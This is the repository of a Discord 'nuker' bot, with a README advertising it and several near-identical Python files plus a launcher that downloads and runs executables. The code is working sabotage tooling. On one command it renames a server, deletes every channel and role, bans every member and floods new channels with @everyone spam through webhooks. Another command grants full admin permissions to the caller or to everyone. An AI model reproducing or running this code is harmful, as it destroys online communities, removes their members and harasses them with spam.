README.md
# Discord Five nuker bot | Download [here](https://github.com/glitch65/Discord-Five-nuker-bot/raw/launcher/launcher.exe)

# Changelog:
> v3.0 added launcher for .exe version of nuker

> v2.3.1 added custom window title and nuker icon (only for .exe version of nuker)

> v2.3 redesigned user interface now it looks better

> v2.2B now the nuker will contact the main repository when checking for updates

> v2.2 added new command 'admin', added version cheker

> v2.1 now you can change how many channels will be created, pings in these channels, and how many roles there will be

> v2.0B fixed activity changer and silent mode

> v2.0 add UI, token check and improved the ban system a little more, it should be faster now

> v2.0pre2 added icon check

> v2.0pre added configuration system and now nuker can be downloaded as a standalone program 

> v1.3 Improved spam in spam channels + no more global rate

> v1.2 Added silent mode 

> v1.1 Added activities → info about it in my discord server

# A nuker bot for discord that can....

1. Rename Server & Add custom server icon
2. Delete all Chanells and roles
3. Spam roles and channel with custom name
4. Spam in Spam channels with custom massage
5. Ban everyone with custom reason
6. Give you (or everyone on the server) admin perms

# Like my bot? then add a star to my repository and join my discord server so you support me and help promote the bot  

> https://discord.gg/QTDXqt8PA8 you can also find announcements, tutorials, information about the bot (exactly what is the ac type and ac name), or just chat with me or other server members 

# How 2 use this bot?
> Tutorial can be founded [here.](https://github.com/glitch65/Discord-Five-nuker-bot/blob/random-stuff/h2u.md)

# Five nuker has 2 commands
> start = will nuke server, admin [me | all] <- 'admin me' will give you a admin role on server, admin all will give everyone admin one the server

# in new updates will be added

1. ~~Spam with webhooks + no more global rate limits :)~~ → Added!
2. ~~More variables so you can quickly customize bot as you want~~ → Added!
3. ~~An optional function to make the bot play a game or stream, etc. with a custom name~~ → Added!
4. An optional function if server has boosts it will change server banner



changelog
[+] added custom window title and nuker icon (only for .exe version of nuker)

bot.py
from discord import Intents, Permissions
from discord.ext import commands
import discord
from asyncio import create_task 
from pathlib import Path
import configparser
import time
import colorama
from colorama import Fore
import os
import urllib3
import fade

config = configparser.ConfigParser()

colorama.init(autoreset=True)

def clear():
    if os.name=='nt':
        os.system('cls')
    else:
        os.system('clear')




ptfc = 'cfg.ini'
pti = 'icon.PNG'
cfg = Path(ptfc)
ic = Path(pti)



http = urllib3.PoolManager()

get_last_ver = http.request('GET', 'https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/ver/ver')
get_changelog = http.request('GET', 'https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/ver/changelog')


ver = get_last_ver.data.decode('utf-8')
chl = get_changelog.data.decode('utf-8')


nversion = str('2.3')




if nversion == ver:
    print(f'{Fore.GREEN}[Update checker]' + '\033[39m' + 'Your version does not need to be updated!')
else:
    print(f'{Fore.GREEN}[Update checker]' + '\033[39m' + 'New version of nuker ' + ver + ' is available!')
    print(f'{Fore.GREEN}Changelog:')
    print(f'{Fore.GREEN}' + chl)
    print(f'{Fore.GREEN}Nuker will close automatically after 5 seconds!')
    time.sleep(5)
    quit()






if ic.is_file():
    f = open('icon.PNG', 'rb')
    icona = f.read()
else:
    print(f'{Fore.RED}[ERROR]' + '\033[39m' + 'Icon not founded')
    time.sleep(1)
    print(f'{Fore.YELLOW}[Icon Check System]' + '\033[39m' + 'Please add icon to bot folder and rename it to icon.PNG')
    input(f'{Fore.YELLOW}[Icon Check System]' + '\033[39m' + 'Press Enter to close program...')
    quit()

if cfg.is_file():
    print(f'{Fore.YELLOW}[Config System]' + '\033[39m' + ' Config founded!')
    config.read('cfg.ini')
    print(f'{Fore.CYAN}[BOT]' + '\033[39m' + 'Starting...')
else:
    print(f'{Fore.RED}[ERROR]' + '\033[39m' + 'Config not found! Creating new config...')
    config['BOT_CFG'] = {'prefix': '!',
                         'token': 'bot token here',
                         'spamtext': '@everyone @here \nImagine get nuked by Five bot \nhttps://github.com/glitch65/Discord-Five-nuker-bot \nXD',
                         'ac_name': 'five nuker on top',
                         'ac_type': '1',
                         'silent_mode': '0',
                         'channels and roles name': 'nuked by five nuker',
                         'webhooks name': 'five nuker',
                         'server name':'nuked by five nuker',
                         'ban reason': 'XDDDD',
                         'how much pings per channel do you want?': '60',
                         'how much channels do you want?': '35', 
                         'how much roles do you want?': '40',
                         'admin role name': 'sh...'}
    
    with open('cfg.ini', 'w') as cfg_file:
            config.write(cfg_file)
    print(f'{Fore.YELLOW}[Config System]' + '\033[39m' + 'Done!')
    print(f'{Fore.YELLOW}[Config System]' + '\033[39m' + 'Edit config file in youre folder and try again')
    input('Press Enter to close program...')
    exit()

clear()



prefix = config['BOT_CFG']['prefix'] 
token = config['BOT_CFG']['token'] 
spamtext = config['BOT_CFG']['spamtext'] 
ac_name = config['BOT_CFG']['ac_name']
ac_type = int(config['BOT_CFG']['ac_type']) 
silent_mode = int(config['BOT_CFG']['silent_mode'] )
chnrln = config['BOT_CFG']['channels and roles name']
wbn = config['BOT_CFG']['webhooks name']
srvn = config['BOT_CFG']['server name']
br = config['BOT_CFG']['ban reason']
howmp = int(config['BOT_CFG']['how much pings per channel do you want?'])
howmc = int(config['BOT_CFG']['how much channels do you want?'])
howmr = int(config['BOT_CFG']['how much roles do you want?'])
adrn = config['BOT_CFG']['admin role name']




intents = Intents.default()
intents.members = True
client = commands.Bot(command_prefix=prefix, help_command=None, intents=intents.all())




bot_started_text = f'{Fore.MAGENTA}Bot launched successfully!'


def login():
    try: client.run(token)
    except: print(f'{Fore.RED}[ERROR]' + '\033[39m' + 'Invalid token please change token and try again.')
    input('Press Enter to exit...')
    quit()

async def rmm():
    clear()
    mm()
    print(bot_started_text.center(115))
    print(f'{Fore.MAGENTA}Logged in as {Fore.GREEN}{client.user}!'.center(120))
    

@client.event
async def on_ready():
    if ac_type == 1 and silent_mode == 0:
        await client.change_presence(activity=discord.Game(name=ac_name))
    elif ac_type == 2 and silent_mode == 0:
        await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=ac_name))
    elif ac_type == 3 and silent_mode == 0:
        await client.change_presence(activity=discord.Streaming(name=ac_name, url='https://www.twitch.tv/discord'))
    elif ac_type == 4 and silent_mode == 0:
        await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=ac_name))
    elif silent_mode == 1:
        await client.change_presence(status=discord.Status.offline)
    await rmm()

async def killobject(obj):
    try: await obj.delete()
    except: pass

async def sendch(ctx,channel: discord.TextChannel,count):
    for _ in range(count):
        try: await channel.send(spamtext)
        except: pass

async def createchannel(ctx,name):
    try:
        chan = await ctx.guild.create_text_channel(name=name)
        wb = await chan.create_webhook(name=wbn,avatar=icona)
        create_task(sendch(ctx,wb,count=howmp))
    except: pass

async def createrole(ctx):
    try: await ctx.guild.create_role(name=chnrln)
    except: pass


@client.command()
async def start(ctx):
    await ctx.message.delete()
    await ctx.guild.edit(name=srvn, icon=icona)
    for rl in ctx.guild.roles:
        create_task(killobject(obj=rl))
    for channel in ctx.guild.channels:
        create_task(killobject(obj=channel))
    create_task(bananaa(ctx=ctx))
    for _ in range(howmr):
        create_task(createrole(ctx))
    for _ in range(howmc):    
        create_task(createchannel(ctx,name=chnrln))

@client.command()
async def admin(ctx,target):
    await ctx.message.delete()
    r =  await ctx.guild.create_role(name=adrn,permissions=Permissions.all())
    if target == 'all':
        for membe in list(ctx.guild.members):
            await membe.add_roles(r)
    elif target == 'me':
        await ctx.message.author.add_roles(r)
            
    
    


async def bananaa(ctx):
    for member in list(ctx.guild.members):
      try:
        await member.ban(reason=br, delete_message_days=7)
      except: pass
 

raw_nuker_logo = '''
                     █████▒ ██▓ ██▒   █▓▓█████     ███▄    █  █    ██  ██ ▄█▀▓█████  ██▀███  
                   ▓██   ▒ ▓██▒▓██░   █▒▓█   ▀     ██ ▀█   █  ██  ▓██▒ ██▄█▒ ▓█   ▀ ▓██ ▒ ██▒
                   ▒████ ░ ▒██▒ ▓██  █▒░▒███      ▓██  ▀█ ██▒▓██  ▒██░▓███▄░ ▒███   ▓██ ░▄█ ▒
                   ░▓█▒  ░ ░██░  ▒██ █░░▒▓█  ▄    ▓██▒  ▐▌██▒▓▓█  ░██░▓██ █▄ ▒▓█  ▄ ▒██▀▀█▄  
                   ░▒█░    ░██░   ▒▀█░  ░▒████▒   ▒██░   ▓██░▒▒█████▓ ▒██▒ █▄░▒████▒░██▓ ▒██▒
                    ▒ ░    ░▓     ░ ▐░  ░░ ▒░ ░   ░ ▒░   ▒ ▒ ░▒▓▒ ▒ ▒ ▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░
                    ░       ▒ ░   ░ ░░   ░ ░  ░   ░ ░░   ░ ▒░░░▒░ ░ ░ ░ ░▒ ▒░ ░ ░  ░  ░▒ ░ ▒░
                    ░ ░     ▒ ░     ░░     ░         ░   ░ ░  ░░░ ░ ░ ░ ░░ ░    ░     ░░   ░ 
                            ░        ░     ░  ░            ░    ░     ░  ░      ░  ░   ░     
                            ░                                                        



'''

info_about_nuker = f'{Fore.MAGENTA}Curent version: ' + f'{Fore.LIGHTGREEN_EX}v' + nversion + f'{Fore.MAGENTA}' + '     Prefix: ' + prefix

empty_space = '''




'''

def mm():
    nuker_logo = fade.purplepink(raw_nuker_logo)
    print(nuker_logo)
    print(info_about_nuker.center(125))
    print(empty_space)


mm()

welcome_text = f'{Fore.MAGENTA}Welcome to Five Nuker press enter to start nuker...'

input(welcome_text.center(120) + f'{Fore.RESET}')
login()





nuker.py
from discord import Intents, Permissions
from discord.ext import commands
import discord
from asyncio import create_task 
from pathlib import Path
import configparser
import colorama
from colorama import Fore
import os
import fade

config = configparser.ConfigParser()

colorama.init(autoreset=True)

def clear():
    if os.name=='nt':
        os.system('cls')
    else:
        os.system('clear')

os.system('taskkill /f /im launcher.exe')
clear()
os.system("title Five Nuker - v3.0 - Made By G1itch")

ptfc = 'Bin\\cfg.ini'
pti = 'Bin\\icon.PNG'
cfg = Path(ptfc)
ic = Path(pti)

with open('Bin\\icon.PNG', 'rb') as f:
    icona = f.read()

nversion = open('Bin\\curent_version.fnv', 'rb')

nversion = nversion.read().decode('utf-8')


if cfg.is_file():
    print(f'{Fore.YELLOW}[Config System]' + '\033[39m' + ' Config founded!')
    config.read('Bin\\cfg.ini')
    print(f'{Fore.CYAN}[BOT]' + '\033[39m' + 'Starting...')
else:
    print(f'{Fore.RED}[ERROR]' + '\033[39m' + 'Config not found! Creating new config...')
    config['BOT_CFG'] = {'prefix': '!',
                         'token': 'bot token here',
                         'spamtext': '@everyone @here \nImagine get nuked by Five bot \nhttps://github.com/glitch65/Discord-Five-nuker-bot \nXD',
                         'ac_name': 'five nuker on top',
                         'ac_type': '1',
                         'silent_mode': '0',
                         'channels and roles name': 'nuked by five nuker',
                         'webhooks name': 'five nuker',
                         'server name':'nuked by five nuker',
                         'ban reason': 'XDDDD',
                         'how much pings per channel do you want?': '60',
                         'how much channels do you want?': '35', 
                         'how much roles do you want?': '40',
                         'admin role name': 'sh...'}
    
    with open('Bin\\cfg.ini', 'w') as cfg_file:
            config.write(cfg_file)
    print(f'{Fore.YELLOW}[Config System]' + '\033[39m' + 'Done!')
    print(f'{Fore.YELLOW}[Config System]' + '\033[39m' + 'Edit config file in youre folder and try again')
    input('Press Enter to close program...')
    exit()

clear()



prefix = config['BOT_CFG']['prefix'] 
token = config['BOT_CFG']['token'] 
spamtext = config['BOT_CFG']['spamtext'] 
ac_name = config['BOT_CFG']['ac_name']
ac_type = int(config['BOT_CFG']['ac_type']) 
silent_mode = int(config['BOT_CFG']['silent_mode'] )
chnrln = config['BOT_CFG']['channels and roles name']
wbn = config['BOT_CFG']['webhooks name']
srvn = config['BOT_CFG']['server name']
br = config['BOT_CFG']['ban reason']
howmp = int(config['BOT_CFG']['how much pings per channel do you want?'])
howmc = int(config['BOT_CFG']['how much channels do you want?'])
howmr = int(config['BOT_CFG']['how much roles do you want?'])
adrn = config['BOT_CFG']['admin role name']




intents = Intents.default()
intents.members = True
client = commands.Bot(command_prefix=prefix, help_command=None, intents=intents.all())




bot_started_text = f'{Fore.MAGENTA}Bot launched successfully!'


def login():
    try: client.run(token)
    except: print(f'{Fore.RED}[ERROR]' + '\033[39m' + 'Invalid token please change token and try again.')
    input('Press Enter to exit...')
    quit()

async def rmm():
    clear()
    mm()
    print(bot_started_text.center(115))
    print(f'{Fore.MAGENTA}Logged in as {Fore.GREEN}{client.user}!'.center(120))
    

@client.event
async def on_ready():
    if ac_type == 1 and silent_mode == 0:
        await client.change_presence(activity=discord.Game(name=ac_name))
    elif ac_type == 2 and silent_mode == 0:
        await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=ac_name))
    elif ac_type == 3 and silent_mode == 0:
        await client.change_presence(activity=discord.Streaming(name=ac_name, url='https://www.twitch.tv/discord'))
    elif ac_type == 4 and silent_mode == 0:
        await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=ac_name))
    elif silent_mode == 1:
        await client.change_presence(status=discord.Status.offline)
    await rmm()

async def killobject(obj):
    try: await obj.delete()
    except: pass

async def sendch(ctx,channel: discord.TextChannel,count):
    for _ in range(count):
        try: await channel.send(spamtext)
        except: pass

async def createchannel(ctx,name):
    try:
        chan = await ctx.guild.create_text_channel(name=name)
        wb = await chan.create_webhook(name=wbn,avatar=icona)
        create_task(sendch(ctx,wb,count=howmp))
    except: pass

async def createrole(ctx):
    try: await ctx.guild.create_role(name=chnrln)
    except: pass


@client.command()
async def start(ctx):
    await ctx.message.delete()
    await ctx.guild.edit(name=srvn, icon=icona)
    for rl in ctx.guild.roles:
        create_task(killobject(obj=rl))
    for channel in ctx.guild.channels:
        create_task(killobject(obj=channel))
    create_task(bananaa(ctx=ctx))
    for _ in range(howmr):
        create_task(createrole(ctx))
    for _ in range(howmc):    
        create_task(createchannel(ctx,name=chnrln))

@client.command()
async def admin(ctx,target):
    await ctx.message.delete()
    r =  await ctx.guild.create_role(name=adrn,permissions=Permissions.all())
    if target == 'all':
        for membe in list(ctx.guild.members):
            await membe.add_roles(r)
    elif target == 'me':
        await ctx.message.author.add_roles(r)
            
    
    


async def bananaa(ctx):
    for member in list(ctx.guild.members):
      try:
        await member.ban(reason=br, delete_message_days=7)
      except: pass
 

raw_nuker_logo = '''
                     █████▒ ██▓ ██▒   █▓▓█████     ███▄    █  █    ██  ██ ▄█▀▓█████  ██▀███  
                   ▓██   ▒ ▓██▒▓██░   █▒▓█   ▀     ██ ▀█   █  ██  ▓██▒ ██▄█▒ ▓█   ▀ ▓██ ▒ ██▒
                   ▒████ ░ ▒██▒ ▓██  █▒░▒███      ▓██  ▀█ ██▒▓██  ▒██░▓███▄░ ▒███   ▓██ ░▄█ ▒
                   ░▓█▒  ░ ░██░  ▒██ █░░▒▓█  ▄    ▓██▒  ▐▌██▒▓▓█  ░██░▓██ █▄ ▒▓█  ▄ ▒██▀▀█▄  
                   ░▒█░    ░██░   ▒▀█░  ░▒████▒   ▒██░   ▓██░▒▒█████▓ ▒██▒ █▄░▒████▒░██▓ ▒██▒
                    ▒ ░    ░▓     ░ ▐░  ░░ ▒░ ░   ░ ▒░   ▒ ▒ ░▒▓▒ ▒ ▒ ▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░
                    ░       ▒ ░   ░ ░░   ░ ░  ░   ░ ░░   ░ ▒░░░▒░ ░ ░ ░ ░▒ ▒░ ░ ░  ░  ░▒ ░ ▒░
                    ░ ░     ▒ ░     ░░     ░         ░   ░ ░  ░░░ ░ ░ ░ ░░ ░    ░     ░░   ░ 
                            ░        ░     ░  ░            ░    ░     ░  ░      ░  ░   ░     
                            ░                                                        



'''

info_about_nuker = f'{Fore.MAGENTA}Curent version: ' + f'{Fore.LIGHTGREEN_EX}v' + nversion + f'{Fore.MAGENTA}' + '     Prefix: ' + prefix

empty_space = '''




'''

def mm():
    nuker_logo = fade.purplepink(raw_nuker_logo)
    print(nuker_logo)
    print(info_about_nuker.center(125))
    print(empty_space)


mm()

welcome_text = f'{Fore.MAGENTA}Welcome to Five Nuker press enter to start nuker...'

input(welcome_text.center(120) + f'{Fore.RESET}')
login()





launcher.py
import urllib.request
import shutil
import os
from pathlib import Path
import urllib3
from colorama import Fore
import colorama
os.system("title Five Nuker - Launcher")
colorama.init(autoreset=True)

def clear():
    if os.name=='nt':
        os.system('cls')
    else:
        os.system('clear')

def clear_installator():
    try:
        os.system('taskkill /f /im installer.exe')
        clear()
        os.remove('installer.exe')
    except: pass


clear_installator()



def remade_bin_folder():
    try:
        os.mkdir('Bin')
    except:
        shutil.rmtree('Bin')
        os.mkdir('Bin')

def move_stuff(type):
    if type == 'no':
        nuker = str(Path('fn.exe'))
        ver_file = str(Path('curent_version.fnv'))
        work_folder = str(os.getcwd())
        bin_folder = work_folder + '\Bin'
        shutil.move(nuker, bin_folder)
        shutil.move(ver_file, bin_folder)
    elif type == 'yes':
        icon = str(Path('icon.PNG'))
        nuker = str(Path('fn.exe'))
        ver_file = str(Path('curent_version.fnv'))
        work_folder = str(os.getcwd())
        bin_folder = work_folder + '\Bin'
        shutil.move(icon, bin_folder)
        shutil.move(nuker, bin_folder)
        shutil.move(ver_file, bin_folder)





http = urllib3.PoolManager()

get_launcher_last_ver = http.request('GET', 'https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/launcher/launcher_last_ver')
get_last_ver = http.request('GET', 'https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/launcher/curent_version.fnv')
get_changelog = http.request('GET', 'https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/ver/changelog')
get_last_ver = get_last_ver.data.decode('utf-8')
get_launcher_last_ver = get_launcher_last_ver.data.decode('utf-8')
get_changelog = get_changelog.data.decode('utf-8')

curent_launcher_ver = str('1.0')
print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Checking for updates...')
if not get_launcher_last_ver == curent_launcher_ver:
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} New version detected!')
    urllib.request.urlretrieve("https://github.com/glitch65/Discord-Five-nuker-bot/raw/launcher/installer.exe", "installer.exe")
    os.system('installer.exe')
else:
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Launcher does not require updating!')


def install_nuker():
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Installing...')
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Downloading fn.exe...')
    urllib.request.urlretrieve("https://github.com/glitch65/Discord-Five-nuker-bot/raw/launcher/five%20nuker.exe", "fn.exe")
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Downloading curent_version.fnv...')
    urllib.request.urlretrieve("https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/launcher/curent_version.fnv", "curent_version.fnv")
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Downloading icon.PNG...')
    urllib.request.urlretrieve("https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/main/icon.PNG", "icon.PNG")
    remade_bin_folder()
    move_stuff('yes')
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Installed!')

def launch_nuker():
    os.system('Bin\\fn.exe')

def n_check():
    try:
        curent_version = open('Bin\curent_version.fnv', 'r')
        curent_version = curent_version.read()
        if curent_version == get_last_ver:
            print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Nuker does not require updating!')
            launch_nuker()
        else:
            update_nuker()
    except:
        install_nuker()
        launch_nuker()



def backup_user_files():
    config = str(Path('Bin\cfg.ini'))
    icon = str(Path('Bin\icon.PNG'))
    work_folder = str(os.getcwd())
    shutil.move(config, work_folder)
    shutil.move(icon, work_folder)

def restore_user_files():
    config = str(Path('cfg.ini'))
    icon = str(Path('icon.PNG'))
    work_folder = str(os.getcwd())
    bin_folder = work_folder + '\\Bin'
    shutil.move(config, bin_folder)
    shutil.move(icon, bin_folder)

def update_nuker():
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Updating nuker...')
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Downloading fn.exe...')
    urllib.request.urlretrieve("https://github.com/glitch65/Discord-Five-nuker-bot/raw/launcher/five%20nuker.exe", "fn.exe")
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Downloading curent_version.fnv...')
    urllib.request.urlretrieve("https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/launcher/curent_version.fnv", "curent_version.fnv")
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Backuping user files...')
    backup_user_files()
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Updating nuker...')
    remade_bin_folder()
    move_stuff('no')
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} restoring user files...')
    restore_user_files()
    print(f'{Fore.YELLOW}[Launcher]{Fore.RESET} Done!')
    launch_nuker()





n_check()


main.py
from discord import Intents, Permissions
from discord.ext import commands
import discord
from asyncio import create_task 
from pathlib import Path
import configparser
import time
import colorama
from colorama import Fore
import os
import urllib3
import fade

config = configparser.ConfigParser()

colorama.init(autoreset=True)

def clear():
    if os.name=='nt':
        os.system('cls')
    else:
        os.system('clear')


os.system("title Five Nuker - v2.3.1 - Made By G1itch")

ptfc = 'cfg.ini'
pti = 'icon.PNG'
cfg = Path(ptfc)
ic = Path(pti)



http = urllib3.PoolManager()

get_last_ver = http.request('GET', 'https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/ver/ver')
get_changelog = http.request('GET', 'https://raw.githubusercontent.com/glitch65/Discord-Five-nuker-bot/ver/changelog')


ver = get_last_ver.data.decode('utf-8')
chl = get_changelog.data.decode('utf-8')


nversion = str('2.3.1')




if nversion == ver:
    print(f'{Fore.GREEN}[Update checker]' + '\033[39m' + 'Your version does not need to be updated!')
else:
    print(f'{Fore.GREEN}[Update checker]' + '\033[39m' + 'New version of nuker ' + ver + ' is available!')
    print(f'{Fore.GREEN}Changelog:')
    print(f'{Fore.GREEN}' + chl)
    print(f'{Fore.GREEN}Nuker will close automatically after 5 seconds!')
    time.sleep(5)
    quit()






if ic.is_file():
    f = open('icon.PNG', 'rb')
    icona = f.read()
else:
    print(f'{Fore.RED}[ERROR]' + '\033[39m' + 'Icon not founded')
    time.sleep(1)
    print(f'{Fore.YELLOW}[Icon Check System]' + '\033[39m' + 'Please add icon to bot folder and rename it to icon.PNG')
    input(f'{Fore.YELLOW}[Icon Check System]' + '\033[39m' + 'Press Enter to close program...')
    quit()

if cfg.is_file():
    print(f'{Fore.YELLOW}[Config System]' + '\033[39m' + ' Config founded!')
    config.read('cfg.ini')
    print(f'{Fore.CYAN}[BOT]' + '\033[39m' + 'Starting...')
else:
    print(f'{Fore.RED}[ERROR]' + '\033[39m' + 'Config not found! Creating new config...')
    config['BOT_CFG'] = {'prefix': '!',
                         'token': 'bot token here',
                         'spamtext': '@everyone @here \nImagine get nuked by Five bot \nhttps://github.com/glitch65/Discord-Five-nuker-bot \nXD',
                         'ac_name': 'five nuker on top',
                         'ac_type': '1',
                         'silent_mode': '0',
                         'channels and roles name': 'nuked by five nuker',
                         'webhooks name': 'five nuker',
                         'server name':'nuked by five nuker',
                         'ban reason': 'XDDDD',
                         'how much pings per channel do you want?': '60',
                         'how much channels do you want?': '35', 
                         'how much roles do you want?': '40',
                         'admin role name': 'sh...'}
    
    with open('cfg.ini', 'w') as cfg_file:
            config.write(cfg_file)
    print(f'{Fore.YELLOW}[Config System]' + '\033[39m' + 'Done!')
    print(f'{Fore.YELLOW}[Config System]' + '\033[39m' + 'Edit config file in youre folder and try again')
    input('Press Enter to close program...')
    exit()

clear()



prefix = config['BOT_CFG']['prefix'] 
token = config['BOT_CFG']['token'] 
spamtext = config['BOT_CFG']['spamtext'] 
ac_name = config['BOT_CFG']['ac_name']
ac_type = int(config['BOT_CFG']['ac_type']) 
silent_mode = int(config['BOT_CFG']['silent_mode'] )
chnrln = config['BOT_CFG']['channels and roles name']
wbn = config['BOT_CFG']['webhooks name']
srvn = config['BOT_CFG']['server name']
br = config['BOT_CFG']['ban reason']
howmp = int(config['BOT_CFG']['how much pings per channel do you want?'])
howmc = int(config['BOT_CFG']['how much channels do you want?'])
howmr = int(config['BOT_CFG']['how much roles do you want?'])
adrn = config['BOT_CFG']['admin role name']




intents = Intents.default()
intents.members = True
client = commands.Bot(command_prefix=prefix, help_command=None, intents=intents.all())




bot_started_text = f'{Fore.MAGENTA}Bot launched successfully!'


def login():
    try: client.run(token)
    except: print(f'{Fore.RED}[ERROR]' + '\033[39m' + 'Invalid token please change token and try again.')
    input('Press Enter to exit...')
    quit()

async def rmm():
    clear()
    mm()
    print(bot_started_text.center(115))
    print(f'{Fore.MAGENTA}Logged in as {Fore.GREEN}{client.user}!'.center(120))
    

@client.event
async def on_ready():
    if ac_type == 1 and silent_mode == 0:
        await client.change_presence(activity=discord.Game(name=ac_name))
    elif ac_type == 2 and silent_mode == 0:
        await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=ac_name))
    elif ac_type == 3 and silent_mode == 0:
        await client.change_presence(activity=discord.Streaming(name=ac_name, url='https://www.twitch.tv/discord'))
    elif ac_type == 4 and silent_mode == 0:
        await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=ac_name))
    elif silent_mode == 1:
        await client.change_presence(status=discord.Status.offline)
    await rmm()

async def killobject(obj):
    try: await obj.delete()
    except: pass

async def sendch(ctx,channel: discord.TextChannel,count):
    for _ in range(count):
        try: await channel.send(spamtext)
        except: pass

async def createchannel(ctx,name):
    try:
        chan = await ctx.guild.create_text_channel(name=name)
        wb = await chan.create_webhook(name=wbn,avatar=icona)
        create_task(sendch(ctx,wb,count=howmp))
    except: pass

async def createrole(ctx):
    try: await ctx.guild.create_role(name=chnrln)
    except: pass


@client.command()
async def start(ctx):
    await ctx.message.delete()
    await ctx.guild.edit(name=srvn, icon=icona)
    for rl in ctx.guild.roles:
        create_task(killobject(obj=rl))
    for channel in ctx.guild.channels:
        create_task(killobject(obj=channel))
    create_task(bananaa(ctx=ctx))
    for _ in range(howmr):
        create_task(createrole(ctx))
    for _ in range(howmc):    
        create_task(createchannel(ctx,name=chnrln))

@client.command()
async def admin(ctx,target):
    await ctx.message.delete()
    r =  await ctx.guild.create_role(name=adrn,permissions=Permissions.all())
    if target == 'all':
        for membe in list(ctx.guild.members):
            await membe.add_roles(r)
    elif target == 'me':
        await ctx.message.author.add_roles(r)
            
    
    


async def bananaa(ctx):
    for member in list(ctx.guild.members):
      try:
        await member.ban(reason=br, delete_message_days=7)
      except: pass
 

raw_nuker_logo = '''
                     █████▒ ██▓ ██▒   █▓▓█████     ███▄    █  █    ██  ██ ▄█▀▓█████  ██▀███  
                   ▓██   ▒ ▓██▒▓██░   █▒▓█   ▀     ██ ▀█   █  ██  ▓██▒ ██▄█▒ ▓█   ▀ ▓██ ▒ ██▒
                   ▒████ ░ ▒██▒ ▓██  █▒░▒███      ▓██  ▀█ ██▒▓██  ▒██░▓███▄░ ▒███   ▓██ ░▄█ ▒
                   ░▓█▒  ░ ░██░  ▒██ █░░▒▓█  ▄    ▓██▒  ▐▌██▒▓▓█  ░██░▓██ █▄ ▒▓█  ▄ ▒██▀▀█▄  
                   ░▒█░    ░██░   ▒▀█░  ░▒████▒   ▒██░   ▓██░▒▒█████▓ ▒██▒ █▄░▒████▒░██▓ ▒██▒
                    ▒ ░    ░▓     ░ ▐░  ░░ ▒░ ░   ░ ▒░   ▒ ▒ ░▒▓▒ ▒ ▒ ▒ ▒▒ ▓▒░░ ▒░ ░░ ▒▓ ░▒▓░
                    ░       ▒ ░   ░ ░░   ░ ░  ░   ░ ░░   ░ ▒░░░▒░ ░ ░ ░ ░▒ ▒░ ░ ░  ░  ░▒ ░ ▒░
                    ░ ░     ▒ ░     ░░     ░         ░   ░ ░  ░░░ ░ ░ ░ ░░ ░    ░     ░░   ░ 
                            ░        ░     ░  ░            ░    ░     ░  ░      ░  ░   ░     
                            ░                                                        



'''

info_about_nuker = f'{Fore.MAGENTA}Curent version: ' + f'{Fore.LIGHTGREEN_EX}v' + nversion + f'{Fore.MAGENTA}' + '     Prefix: ' + prefix

empty_space = '''




'''

def mm():
    nuker_logo = fade.purplepink(raw_nuker_logo)
    print(nuker_logo)
    print(info_about_nuker.center(125))
    print(empty_space)


mm()

welcome_text = f'{Fore.MAGENTA}Welcome to Five Nuker press enter to start nuker...'

input(welcome_text.center(120) + f'{Fore.RESET}')
login()



